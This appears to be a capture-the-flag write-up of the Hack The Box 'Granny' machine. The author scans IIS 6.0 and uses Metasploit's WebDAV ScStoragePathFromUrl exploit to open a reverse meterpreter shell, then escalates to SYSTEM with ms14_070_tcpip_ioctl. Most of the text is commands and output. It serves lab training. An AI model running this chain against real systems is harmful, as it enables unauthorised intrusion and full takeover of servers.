From the HacktheBox
twitter:@ikk_hck
Enumeration
Anyway, nmap.
$ nmap -sC -sV -A -oA granny 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 03:19 PDT
Here are the results.
# Nmap 7.91 scan initiated Sat May 8 01:11:23 2021 as: nmap -sC -sV -A -oA granny 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.19s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
|_ Server Date: Sat, 08 May 2021 08:13:22 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 8 01:11:48 2021 -- 1 IP address (1 host up) scanned in 25.44 seconds
You can see that Microsoft IIS httpd 6.0 is working.
I'll look for it in Metasploit.
$ msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.0.40-dev ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
msf6 > search iis 6.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
1 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
2 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
Exploit
I found it, set the ip address, etc. and ran it.
msf6 > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syn
tax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.15:80 - The target is vulnerable.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.15:1030) at 2021-05-10 03:24:21 -0700
meterpreter >
The intrusion was successful.
PE
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
I try to check permissions, but I can't seem to even do that.
Let's check the process.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
596 396 svchost.exe
680 396 svchost.exe
736 396 svchost.exe
784 396 svchost.exe
800 396 svchost.exe
936 396 spoolsv.exe
964 396 msdtc.exe
1084 396 cisvc.exe
1124 396 svchost.exe
1180 396 inetinfo.exe
1216 396 svchost.exe
1332 396 VGAuthService.exe
1412 396 vmtoolsd.exe
1464 396 svchost.exe
1628 396 svchost.exe
1732 396 dllhost.exe
1816 396 alg.exe
1832 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse
.exe
1900 396 dllhost.exe
2120 396 vssvc.exe
2176 1464 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.
exe
2244 596 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcd
ata.exe
2308 2176 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
2488 596 wmiprvse.exe
What's my process?
meterpreter > getpid
Current pid: 2308
meterpreter > getpid
Current pid: 2308
I see, it will move to one of the processes whose username is "NT AUTHORITY\NETWORK SERVICE".
meterpreter > migrate 2244
[*] Migrating from 2308 to 2244...
[*] Migration completed successfully.
Then you check the user again, you will see that it is "NT AUTHORITY\NETWORK SERVICE".
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
Return to the local terminal once to find a code that can be used for PE.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 37 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options
Module options (exploit/windows/local/ms14_058_track_popup_menu):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Launching notepad to host the exploit...
[+] Process 1824 launched.
[*] Reflectively injecting the exploit DLL into 1824...
[*] Injecting exploit into 1824...
[*] Exploit injected. Injecting payload into 1824...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
I try to use "ms14_058_track_popup_menu", but it doesn't work.
Next, try to use "ms14_070_tcpip_ioctl".
msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options
Module options (exploit/windows/local/ms14_070_tcpip_ioctl):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Server 2003 SP2
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.15:1031) at 2021-05-10 03:32:40 -0700
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
It seems to have succeeded, so I went ahead and checked the permissions and found that they are "NT AUTHORITY\SYSTEM".
Then, follow the steps below to explore and get the flag.
meterpreter > cd /
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-04-12 07:27:12 -0700 ADFS
100777/rwxrwxrwx 0 fil 2017-04-12 07:04:44 -0700 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-04-12 07:04:44 -0700 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 Documents and Settings
40777/rwxrwxrwx 0 dir 2017-04-12 07:17:24 -0700 FPSE_search
100444/r--r--r-- 0 fil 2017-04-12 07:04:44 -0700 IO.SYS
40777/rwxrwxrwx 0 dir 2017-04-12 07:16:33 -0700 Inetpub
100444/r--r--r-- 0 fil 2017-04-12 07:04:44 -0700 MSDOS.SYS
100555/r-xr-xr-x 47772 fil 2007-02-18 04:00:00 -0800 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2017-04-12 06:43:02 -0700 Program Files
40777/rwxrwxrwx 0 dir 2017-04-12 12:02:02 -0700 RECYCLER
40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 System Volume Information
40777/rwxrwxrwx 0 dir 2017-04-12 06:41:07 -0700 WINDOWS
100666/rw-rw-rw- 208 fil 2017-04-12 06:42:08 -0700 boot.ini
100444/r--r--r-- 297072 fil 2007-02-18 04:00:00 -0800 ntldr
0000/--------- 0 fif 1969-12-31 16:00:00 -0800 pagefile.sys
40777/rwxrwxrwx 0 dir 2017-04-12 07:05:06 -0700 wmpub
meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Administrator
40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 All Users
40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 Default User
40777/rwxrwxrwx 0 dir 2017-04-12 12:19:46 -0700 Lakis
40777/rwxrwxrwx 0 dir 2017-04-12 07:08:32 -0700 LocalService
40777/rwxrwxrwx 0 dir 2017-04-12 07:08:31 -0700 NetworkService
meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================
Mode Size Type Last modified Name
--------- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Application Data
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Cookies
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Desktop
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Favorites
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Local Settings
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 My Documents
100666/rw-rw-rw- 786432 fil 2017-04-12 07:12:15 -0700 NTUSER.DAT
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 NetHood
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 PrintHood
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Recent
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 SendTo
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Start Menu
100666/rw-rw-rw- 0 fil 2017-04-12 07:12:15 -0700 Sti_Trace.log
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Templates
40777/rwxrwxrwx 0 dir 2017-04-12 11:48:10 -0700 UserData
100666/rw-rw-rw- 1024 fil 2017-04-12 07:12:15 -0700 ntuser.dat.LOG
100666/rw-rw-rw- 178 fil 2017-04-12 07:12:15 -0700 ntuser.ini
meterpreter > cd Desktop
lmeterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
--------- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-12 07:28:50 -0700 root.txt
incidentally
If you try to PE without changing it from the original process, you will get the following.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
Good night.
Top comments (0)